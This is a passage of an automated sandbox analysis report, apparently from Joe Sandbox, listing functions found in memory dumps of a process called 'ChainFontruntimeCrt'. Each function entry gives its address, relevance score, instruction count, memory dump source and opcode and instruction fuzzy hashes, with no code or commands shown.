                                                                                                                        • Instruction ID: f84a7d9ebac33f9ad9726e4058355656b17d59c5ba27f78f19d46030b451f17c
                                                                                                                        • Opcode Fuzzy Hash: 7f9382b89b318451a43ccdc89d86c575de688e9e09fdb4f721904f80aee2479a
                                                                                                                        • Instruction Fuzzy Hash: AFB1B270A19A4A8FE75ADB58C0A06A4B7A1FF58304F5581B9C04EC7AE6CB38F951C7C1
                                                                                                                        Function 00007FFD9BBE3FC8 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 0-3916222277
                                                                                                                        • Opcode ID: 45f3ccb8ca4f23873adc460d09860f91c438db179adf5094dff1d28f1505cee9
                                                                                                                        • Instruction ID: ffc8c369ec5d0d7abf85e5b05f3a2e0f5f5b09c1205210418c02073b6abedf3d
                                                                                                                        • Opcode Fuzzy Hash: 45f3ccb8ca4f23873adc460d09860f91c438db179adf5094dff1d28f1505cee9
                                                                                                                        • Instruction Fuzzy Hash: 3D515E31E0964E8FDB69DB98C4615BDB7B1FF54304F1140BED01ADB2E6DA386A01CB82
                                                                                                                        Function 00007FFD9BBE8FF8 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 0-3916222277
                                                                                                                        • Opcode ID: 2f553feb90c73116dc1d2dc2811ee9fe7821f07575b0b55470aeb8f5824aa170
                                                                                                                        • Instruction ID: a3a79c806af9a397e95b29c8442bac1721ab41d96b1d30769121cb141933e917
                                                                                                                        • Opcode Fuzzy Hash: 2f553feb90c73116dc1d2dc2811ee9fe7821f07575b0b55470aeb8f5824aa170
                                                                                                                        • Instruction Fuzzy Hash: 86516B31E0954E8FDB59DB98C8645FCB7B1FF44304F1140BAD05EAB2E6DA392A05CB82
                                                                                                                        Function 00007FFD9BBEDEB8 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 0-3916222277
                                                                                                                        • Opcode ID: 5261d648f704b987f721a77f084ca016ca63df321398788f9d16fc606fb12473
                                                                                                                        • Instruction ID: 8f2b3fa608a5f9293f803dcb1a96de2a21fa6e436017fd4dce32e999dc4e0ea7
                                                                                                                        • Opcode Fuzzy Hash: 5261d648f704b987f721a77f084ca016ca63df321398788f9d16fc606fb12473
                                                                                                                        • Instruction Fuzzy Hash: 5E51A131E0954E8FDB68DB94C4A55FDB7B1FF54304F1140B9D01AE72E2CA746A01CB81
                                                                                                                        Function 00007FFD9BBEBE52 Relevance: .7, Instructions: 688COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 96240cdb86f0705c04cff81148de5e5f87921c00ba5b38eaf5ae19fee9f07a43
                                                                                                                        • Instruction ID: 63cead827c398f5b2631de217536dc3513971fb60533aac3062b8116eeed1468
                                                                                                                        • Opcode Fuzzy Hash: 96240cdb86f0705c04cff81148de5e5f87921c00ba5b38eaf5ae19fee9f07a43
                                                                                                                        • Instruction Fuzzy Hash: EE329430B19A1D8FDBA8DB58C8A5A7973E2FF54315B1141B9D00EC72F2DA34AD45CB82
                                                                                                                        Function 00007FFD9BBEE12F Relevance: .4, Instructions: 414COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 383be6980c5b9a478c7dcb2b1b764011489e075bc1e694e53156e597b7ca5649
                                                                                                                        • Instruction ID: 948c3d45703e4aa1eecccf583deda002c6257d6ba944c4a77a320d41d6f20510
                                                                                                                        • Opcode Fuzzy Hash: 383be6980c5b9a478c7dcb2b1b764011489e075bc1e694e53156e597b7ca5649
                                                                                                                        • Instruction Fuzzy Hash: E4F1E530A195498FEB99CF54C0E06B537A1FF49304F5545BDD84ACB2EADA38F981CB82
                                                                                                                        Function 00007FFD9BBEA2B1 Relevance: .4, Instructions: 401COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d967355b2ad3dae926212cd9d4ff17dfcaf18e19a2e1229c2d36f85fe3964e7d
                                                                                                                        • Instruction ID: f6829d45290af128017ba0597d035ad78e44de7520f6c0952d8be175d788eba4
                                                                                                                        • Opcode Fuzzy Hash: d967355b2ad3dae926212cd9d4ff17dfcaf18e19a2e1229c2d36f85fe3964e7d
                                                                                                                        • Instruction Fuzzy Hash: B1D1F330A0EA0E8FD378DB58D4A467577E5FF45308B11457DC44B876F2DB29B9428B82
                                                                                                                        Function 00007FFD9BBE52A7 Relevance: .4, Instructions: 383COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 84b8034d0798b65257f65970eee9332788fdfc19626ee670d49c0ba15a904c24
                                                                                                                        • Instruction ID: d126421081af3569e8695712d967c5619b8fb3ca3812141c62dc5e9f3c430210
                                                                                                                        • Opcode Fuzzy Hash: 84b8034d0798b65257f65970eee9332788fdfc19626ee670d49c0ba15a904c24
                                                                                                                        • Instruction Fuzzy Hash: 41D1F230A1EB4A8FE378CB58D4A157577E1FF44308B11457EC08E876F6DB29B9428782
                                                                                                                        Function 00007FFD9BBE928F Relevance: .3, Instructions: 331COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 963bb2a0019d0017c6b920c8ec07974f264bbd3f82fd905b91b8cfa99b9f350b
                                                                                                                        • Instruction ID: 882ac1b638f07b46c0af6914582e2706aa73e2cd4ac76fb5d7c2cc32612470c7
                                                                                                                        • Opcode Fuzzy Hash: 963bb2a0019d0017c6b920c8ec07974f264bbd3f82fd905b91b8cfa99b9f350b
                                                                                                                        • Instruction Fuzzy Hash: AFC1D2306196468BEB29CF48C0E81B937A1FF45304B5545BDC89F8B6EBD738E545CB82
                                                                                                                        Function 00007FFD9BBEE14F Relevance: .3, Instructions: 329COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0a324ccbc9cf2cb6eeec79cb5549cfc9ffd89a1f0f9dddc90e15f7156bd55cd5
                                                                                                                        • Instruction ID: 8a59f0e9ad741d18e905d4b0a5aaed824c8117702c82d7f49dd25be43af1c0ab
                                                                                                                        • Opcode Fuzzy Hash: 0a324ccbc9cf2cb6eeec79cb5549cfc9ffd89a1f0f9dddc90e15f7156bd55cd5
                                                                                                                        • Instruction Fuzzy Hash: 1EC1D130A1954A8BEB69CF44C0E05B537A1FF49304F5545BDD84B8B6EBDA38F981CB82
                                                                                                                        Function 00007FFD9BBEDA4E Relevance: .3, Instructions: 283COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4ec5568f58173124ce74962761ab87dd2b6d204dafd7bcf098659caaed00eea1
                                                                                                                        • Instruction ID: 1e1dea7c580726cb476717b21719a92319138473d144f4936e80d7741d1e45e4
                                                                                                                        • Opcode Fuzzy Hash: 4ec5568f58173124ce74962761ab87dd2b6d204dafd7bcf098659caaed00eea1
                                                                                                                        • Instruction Fuzzy Hash: DFA10530A1DA4A8FE759DB68C0A06A4B7A0FF45304F4545B9C44EC7BE6CBA8F951CBC1
                                                                                                                        Function 00007FFD9BBEB3F3 Relevance: .3, Instructions: 283COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1e7ff0574c914629406ff84a7fcea10b73644b086dd783cebdb826b3384beba3
                                                                                                                        • Instruction ID: a970d33cb56c5e754f67feffb389901837d2c9aa29b6a55cae664c459824fbd5
                                                                                                                        • Opcode Fuzzy Hash: 1e7ff0574c914629406ff84a7fcea10b73644b086dd783cebdb826b3384beba3
                                                                                                                        • Instruction Fuzzy Hash: 42119D52F0F18E8AF73952A418B10BCB9407F90318F5B05BAD64E861F6DE4C6A4462C3
                                                                                                                        Function 00007FFD9BBE8B7A Relevance: .3, Instructions: 282COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1cb7e2a675c8bbd18aa5f9c4d54b05cdce64a2bd33d3c85d2593828f9d86f461
                                                                                                                        • Instruction ID: d4fc1672d3a8f2c84f0dfa5081802faacd57e6c2cee9154ee6e184d7b0f80ad7
                                                                                                                        • Opcode Fuzzy Hash: 1cb7e2a675c8bbd18aa5f9c4d54b05cdce64a2bd33d3c85d2593828f9d86f461
                                                                                                                        • Instruction Fuzzy Hash: 0DA1163060DE8A8FD759DB68D8A06A4B7A0FF15304F4541BDC44EC7AE6CB28B951C7D2
                                                                                                                        Function 00007FFD9BBE444F Relevance: .3, Instructions: 281COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2be44939296f5daf7d41e0778775ffde1bf35ac5b35f93bd2573fe60333f4b67
                                                                                                                        • Instruction ID: 5d3d976be649ade07be62408bf541b3804d3c9f0aab8ed3352a2bd447dc41aa0
                                                                                                                        • Opcode Fuzzy Hash: 2be44939296f5daf7d41e0778775ffde1bf35ac5b35f93bd2573fe60333f4b67
                                                                                                                        • Instruction Fuzzy Hash: 72A10630A195598FEB68CF18C0A06B877A1FF54314F5541FDC44ECB5EADA38E981CB82
                                                                                                                        Function 00007FFD9BBE3026 Relevance: .3, Instructions: 256COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5a5b5b943f8a09a15325ee3a67212606b7f0c388ee3ffa9e841cfc50e2ff5c9d
                                                                                                                        • Instruction ID: 860b5d3f1b5b0c13bcb5936b39a4a6d82e6b22af81f50b19f90ceeb5077bf6ac
                                                                                                                        • Opcode Fuzzy Hash: 5a5b5b943f8a09a15325ee3a67212606b7f0c388ee3ffa9e841cfc50e2ff5c9d
                                                                                                                        • Instruction Fuzzy Hash: 5D812631B0EA4A4FE7399A58946517977E0FF81314B16057EE48F832F3DE29B9028783
                                                                                                                        Function 00007FFD9BBE8056 Relevance: .3, Instructions: 255COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8d0b29cb1ddbfc91b9fe8af9d9db6c841708b84064fe70526d26202ea95e1f41
                                                                                                                        • Instruction ID: 59f5e45f05f06556266b12dece93535925ba0bbde0423ac89298f1bdf3c640aa
                                                                                                                        • Opcode Fuzzy Hash: 8d0b29cb1ddbfc91b9fe8af9d9db6c841708b84064fe70526d26202ea95e1f41
                                                                                                                        • Instruction Fuzzy Hash: 4C811431B1EE4A4FE7788A58A86157577E0FF45318B16007EE48EC31F2DE29B9028783
                                                                                                                        Function 00007FFD9BBECF16 Relevance: .3, Instructions: 252COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a037c4993f0e40f93e67e22a450011559c320bd73f3956aef3e3a47fda68f9be
                                                                                                                        • Instruction ID: 55edb3a1673a1ac66cae0a51bd7e79e148c9bd08b91596736e1e1b67184d7e82
                                                                                                                        • Opcode Fuzzy Hash: a037c4993f0e40f93e67e22a450011559c320bd73f3956aef3e3a47fda68f9be
                                                                                                                        • Instruction Fuzzy Hash: 48813631B0EA4A4FE3789A9894615B577E0FF45314B16057EE48EC72F3CA69B90287C3
                                                                                                                        Function 00007FFD9BBE1479 Relevance: .2, Instructions: 248COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 51e185b5a3bad2b0dedb030a7c063c73657bed3c85961752dccc06712ae958f9
                                                                                                                        • Instruction ID: 8d74694331028cec11e51a04a6c3173d8440c317f1bff00339030fc008efd846
                                                                                                                        • Opcode Fuzzy Hash: 51e185b5a3bad2b0dedb030a7c063c73657bed3c85961752dccc06712ae958f9
                                                                                                                        • Instruction Fuzzy Hash: 1F711431A0E54D4FE778DA58C8665B933D0FF48314B2602B9D49FC75F2DE18AA0687C2
                                                                                                                        Function 00007FFD9BBE61B9 Relevance: .2, Instructions: 246COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: bbb38a4d3d9417e42ed5d21c7cc31df98210a3892e0ea4c901b7fa338081635e
                                                                                                                        • Instruction ID: 0f93b17e667208782afd32e2168abe366337966006a5716f08f8609d9da4a2d2
                                                                                                                        • Opcode Fuzzy Hash: bbb38a4d3d9417e42ed5d21c7cc31df98210a3892e0ea4c901b7fa338081635e
                                                                                                                        • Instruction Fuzzy Hash: 5F711571A0E94D4FE778DA5888665B937C0FF44315B1202B9E49FC75F2DE28AA0687C3
                                                                                                                        Function 00007FFD9BBE6D7B Relevance: .2, Instructions: 235COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8eacc72e822e2d7d83ea4b3cbf84ef810a0cdc283d830c8975372d6210fc72d8
                                                                                                                        • Instruction ID: d150f4f43cbfb3461202f1b0825642a5dda7267ea15bf0ac53b71e7af3f255f1
                                                                                                                        • Opcode Fuzzy Hash: 8eacc72e822e2d7d83ea4b3cbf84ef810a0cdc283d830c8975372d6210fc72d8
                                                                                                                        • Instruction Fuzzy Hash: 6971A130E1954E8FEBA5DBA4C8A16BCBBA1FF49304F5101B9D00BD71E5DA386A41C782
                                                                                                                        Function 00007FFD9BBEBC3B Relevance: .2, Instructions: 234COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e6a3c815f74cf2b066286a2760b06f9e97b9233f2c9514f6864fd89135c94d47
                                                                                                                        • Instruction ID: 2442310a5946427bb95def3b3916469b2275b1f2f205f6687b3a3ef515de540e
                                                                                                                        • Opcode Fuzzy Hash: e6a3c815f74cf2b066286a2760b06f9e97b9233f2c9514f6864fd89135c94d47
                                                                                                                        • Instruction Fuzzy Hash: 0D819130E1E54E8FEB78DBA488B16BDB7A1FF59304F1104B9D00AD72F1DE2869418782
                                                                                                                        Function 00007FFD9BBE1D4B Relevance: .2, Instructions: 234COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b3a4cfc26551b2c73f141d8de5f912e203cf1136d438525abd25b1473bdd1c9e
                                                                                                                        • Instruction ID: 6b0d1a6bf784e251fa911b282e70900cdab2426db270475be8f40aa425da2064
                                                                                                                        • Opcode Fuzzy Hash: b3a4cfc26551b2c73f141d8de5f912e203cf1136d438525abd25b1473bdd1c9e
                                                                                                                        • Instruction Fuzzy Hash: CB819430E1954E8FEB65DBA488606FC7BA1FF59304F6101B9D00ED71E6DA386941C781
                                                                                                                        Function 00007FFD9BBED398 Relevance: .2, Instructions: 228COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 15abc3b7a7bbed1dd7aea5e014af8153720031744e7cfc37721663fb4d205107
                                                                                                                        • Instruction ID: 905187c0387fc40d1a0d5232b5cca86ff5759dbf8b3f9a623a3e70bffcd732aa
                                                                                                                        • Opcode Fuzzy Hash: 15abc3b7a7bbed1dd7aea5e014af8153720031744e7cfc37721663fb4d205107
                                                                                                                        • Instruction Fuzzy Hash: 4671E32071E3864FD72E4B6484711747BA0FF46318B2A42FEC0DB8B1F3DA59A9438782
                                                                                                                        Function 00007FFD9BBEB0A2 Relevance: .2, Instructions: 221COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c43754c72db078a920410f97227859e3cc61b79ddd87435eb574e1735a59076d
                                                                                                                        • Instruction ID: 001189e1f141c469dcf88c0ce7953ffaad935bc2a77c89fc77106684a48ff840
                                                                                                                        • Opcode Fuzzy Hash: c43754c72db078a920410f97227859e3cc61b79ddd87435eb574e1735a59076d
                                                                                                                        • Instruction Fuzzy Hash: 4761043172D44D8FE778DA5888B66B937C0FF54324B0602B9E05EC75F2DA18AA0687C3
                                                                                                                        Function 00007FFD9BBE9600 Relevance: .2, Instructions: 175COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4ea60e167a2a872f24f61d999779755e5627f8441162eb50892983aebe124e1e
                                                                                                                        • Instruction ID: f1ddb0321eb3cf3a355610f9d672cc51cf72e778e8ad2675e48891b7bfe864ec
                                                                                                                        • Opcode Fuzzy Hash: 4ea60e167a2a872f24f61d999779755e5627f8441162eb50892983aebe124e1e
                                                                                                                        • Instruction Fuzzy Hash: 3A512630A0D58E8FEB6C9B5844756FCB7A1FF55304F4104BAD08EC72E6DE386A488782
                                                                                                                        Function 00007FFD9BBEB7BE Relevance: .2, Instructions: 159COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 42c3ef050221093c510e70e3c912963aba2f9f8f7a0ccab5c4628de212df288f
                                                                                                                        • Instruction ID: 843516f5ef8c1eb2914f4c604ca3e96a6b27e8ef294dea8bed98ae35e0baa410
                                                                                                                        • Opcode Fuzzy Hash: 42c3ef050221093c510e70e3c912963aba2f9f8f7a0ccab5c4628de212df288f
                                                                                                                        • Instruction Fuzzy Hash: 1651FB35E0995D8FDBA8DB58C4B5AADB7A1FF58304F1101BAD04EE33A1CE346980CB41
                                                                                                                        Function 00007FFD9BBE8B8E Relevance: .1, Instructions: 147COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: fce18c5b5646c4a57698ae2144852f2a676c18f88bf04d35c63618325b6c00b8
                                                                                                                        • Instruction ID: af1c9a34a55c324de95442bcfe69dbe98b27fcd7ae5c9e06311bb54acf22b82b
                                                                                                                        • Opcode Fuzzy Hash: fce18c5b5646c4a57698ae2144852f2a676c18f88bf04d35c63618325b6c00b8
                                                                                                                        • Instruction Fuzzy Hash: C051DF70B19D0A5BE798DB58D4A0AA4B3A1FF58304F418179C40EC7BE6CB38F8518BC1
                                                                                                                        Function 00007FFD9B7D090D Relevance: .1, Instructions: 145COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1760148325.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b7d0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
